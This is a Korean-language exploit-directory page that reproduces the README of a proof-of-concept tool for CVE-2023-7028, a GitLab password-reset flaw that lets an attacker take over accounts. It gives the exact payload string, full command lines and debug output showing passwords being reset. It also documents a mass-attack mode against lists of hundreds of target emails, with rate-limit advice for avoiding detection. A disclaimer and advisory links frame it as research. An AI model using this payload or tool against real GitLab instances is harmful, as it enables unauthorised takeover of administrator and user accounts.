Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-7028 — 이 저장소의 포크는 CVE-2023-7028에 대한 개념 증명을 제시합니다. 저는 익스플로잇 사용법만 개선했습니다. | Kitploit
도구/GitHubGitHub/szybnev/cve-2023-7028
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubszybnev/cve-2023-7028

CVE-2023-7028

이 저장소의 포크는 CVE-2023-7028에 대한 개념 증명을 제시합니다. 저는 익스플로잇 사용법만 개선했습니다.

저장소 보기
171년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-7028 | 계정 탈취 Gitlab

면책 조항

이 코드는 취약점의 개념 증명이며, 소유하지 않은 Gitlab 인스턴스에서 사용하도록 권장하는 것이 아닙니다. 이 도구는 연구 및 교육 목적으로만 개발되었으며, 이 도구를 사용하여 발생하는 모든 행위에 대해 책임을 지지 않습니다.

설명

이 저장소는 https://github.com/Vozec/CVE-2023-7028의 포크입니다. 저는 단지 익스플로잇 사용법을 개선했을 뿐입니다.

CVE-2023-7028은 사용자 상호작용 없이 Gitlab 관리자 계정을 장악할 수 있는 계정 탈취 취약점을 말합니다.

취약점은 비밀번호 재설정 시 이메일 관리에 있습니다. 공격자는 2개의 이메일을 제공할 수 있으며 재설정 코드가 두 이메일 모두로 전송됩니다. 따라서 대상 계정의 이메일 주소와 공격자의 이메일 주소를 모두 제공하여 관리자 비밀번호를 재설정할 수 있습니다. (Gitlab은 2단계 인증이 이 취약점 악용을 막는다고 지적합니다. 공격자가 비밀번호를 재설정한 후에도 로그인할 수 없기 때문입니다.)

이 취약점은 asterion04이 발견했습니다.

페이로드

다음은 예시 페이로드입니다.

user[email][][email protected]&user[email][][email protected]

PoC

방법 1: 임시 이메일 사용 (단일 대상)

python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t [email protected]

[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: [email protected]
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = bc91lpzwTOaY9dg5SWjLvvDDb61j6ZunCX4DXYlSnWz9Y3zK35SPiLNShhrDrPVDgY_AzQjzpD5qVt2WXeolog
[DEBUG] Sending reset password request
[DEBUG] Emails sended to [email protected] and [email protected] !
[DEBUG] Waiting mail, sleeping for 7.5 seconds
[DEBUG] Getting link using temp-mail | Try N°1 on 5
[DEBUG] Getting last mail for [email protected]
[DEBUG] 1 mail(s) found
[DEBUG] Reading the last one
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = RN6gypVz7Zxtu2zRsJmKPsDHNumIH_UPvdn7aQoWRBnUcqmW1hcu8kYcMvI6XbTDsYuZieMFypbe8SWi3q781w
[DEBUG] Changing password to l3mG2v2XN4UBzbN18ZkW
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: [email protected]
        Password: l3mG2v2XN4UBzbN18ZkW

방법 2: 악성 이메일 사용 (단일 대상)

python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t [email protected] -e [email protected]

[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = 1Yt1EUeWSL-oiSV7v1Z6ghdCDG3w0FFCQB8Uc5B5GAodVNJ26OlPT8HtYYleGXB9F0otas3gnHOtRfhFall8pQ
[DEBUG] Sending reset password request
[DEBUG] Emails sended to [email protected] and [email protected] !
        Input link received by mail: https://gitlab.example.com/users/password/edit?reset_password_token=U8PSU7DXdebdTD3GjMiX
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = N7gs43C9ZMxdniA9UEzzfH2Rlhgejt75M1Kw88vaarP_Z4uE38JjPDT6ZM-xA_mDfZm3HyO-E8jeCFzFMfoOHA
[DEBUG] Changing password to EU7XIYjlawjb5tH2jgmU
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: [email protected]
        Password: EU7XIYjlawjb5tH2jgmU

방법 3: 파일에서 이메일 목록 사용

python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting full attacks on 806 target(s) with rate limit 10 rps
[DEBUG] Processing target 1/806: [email protected]
[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: [email protected]
[DEBUG] Reset request sent successfully for [email protected]
...
[DEBUG] Attack completed: 800/806 requests sent, 750/806 passwords reset

방법 4: 건너뛰기 모드 - 재설정 요청만 보내기 (더 빠름)

python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt --skip -rps 20

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting reset requests on 806 target(s) with rate limit 20 rps
[DEBUG] Processing target 1/806: [email protected]
[DEBUG] Reset request sent successfully for [email protected]
[DEBUG] Processing target 2/806: [email protected]
[DEBUG] Reset request sent successfully for [email protected]
...
[DEBUG] Reset requests completed: 800/806 successful

도움말

$ python3 ./CVE-2023-7028.py -h
usage: CVE-2023-7028.py [-h] -u URL (-t TARGET | -l EMAIL_LIST) [-e EVIL] [-p PASSWORD] [--skip] [-rps RATE_LIMIT]

This tool automates CVE-2023-7028 on gitlab

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Gitlab url
-t TARGET, --target TARGET
Target email
-l EMAIL_LIST, --list EMAIL_LIST
File with target emails list
-e EVIL, --evil EVIL Evil email
-p PASSWORD, --password PASSWORD
Password
--skip Skip password reset, only send reset requests
-rps RATE_LIMIT, --rate RATE_LIMIT
Requests per second (default: 10)

사용 참고 사항

  • 단일 대상: -t 매개변수를 사용하여 단일 이메일 주소를 공격합니다.
  • 다중 대상: -l 매개변수를 사용하여 파일에서 이메일 주소를 로드합니다 (한 줄에 하나씩).
  • 악성 이메일: --evil 옵션이 없으면 스크립트가 공용 임시 메일을 사용하여 재설정 링크를 찾습니다 (펜테스트 중 주의하세요).
  • 건너뛰기 모드: --skip을 사용하여 비밀번호 재설정을 기다리지 않고 재설정 요청만 보냅니다 (대량 공격 시 더 빠름).
  • 속도 제한: -rps를 사용하여 초당 요청 수를 제어합니다 (기본값: 10). 값이 높을수록 더 빠르지만 탐지 가능성도 높아집니다.
  • 이메일 목록 형식: 한 줄에 하나의 이메일이 있는 일반 텍스트 파일.

예시

# Single target with custom password
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t [email protected] -p MyCustomPass123

# Mass attack with slower rate limit
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt -rps 5

# Fast reconnaissance - only send reset requests
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt --skip -rps 50

영향을 받는 버전

  • 16.1 to 16.1.5
  • 16.2 to 16.2.8
  • 16.3 to 16.3.6
  • 16.4 to 16.4.4
  • 16.5 to 16.5.5
  • 16.6 to 16.6.3
  • 16.7 to 16.7.1

참고 자료

  • https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
  • https://docs.gitlab.com/ee/install/docker.html
  • https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0030/
도구 다운로드